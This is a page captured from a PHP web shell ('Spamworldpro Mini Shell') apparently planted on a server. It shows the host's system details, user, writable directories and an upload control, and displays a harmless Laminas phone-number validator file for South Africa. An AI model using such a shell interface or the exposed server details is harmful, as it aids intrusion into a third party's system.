Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/old/vendor/laminas/laminas-i18n/src/Validator/PhoneNumber/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/old/vendor/laminas/laminas-i18n/src/Validator/PhoneNumber/ZA.php
<?php

return [
    'code' => '27',
    'patterns' => [
        'national' => [
            'general' => '/^(?:[1-79]\\d{8}|8(?:[067]\\d{7}|[1-4]\\d{3,7}))$/',
            'fixed' => '/^(?:1[0-8]|2[0-378]|3[1-69]|4\\d|5[1346-8])\\d{7}$/',
            'mobile' => '/^(?:(?:6[0-5]|7[0-46-9])\\d{7}|8[1-4]\\d{3,7})$/',
            'tollfree' => '/^80\\d{7}$/',
            'premium' => '/^(?:86[2-9]\\d{6}|90\\d{7})$/',
            'shared' => '/^860\\d{6}$/',
            'voip' => '/^87\\d{7}$/',
            'uan' => '/^861\\d{6}$/',
            'emergency' => '/^1(?:01(?:11|77)|12)$/',
        ],
        'possible' => [
            'general' => '/^\\d{5,9}$/',
            'fixed' => '/^\\d{9}$/',
            'tollfree' => '/^\\d{9}$/',
            'premium' => '/^\\d{9}$/',
            'shared' => '/^\\d{9}$/',
            'voip' => '/^\\d{9}$/',
            'uan' => '/^\\d{9}$/',
            'emergency' => '/^\\d{3,5}$/',
        ],
    ],
];

Spamworldpro Mini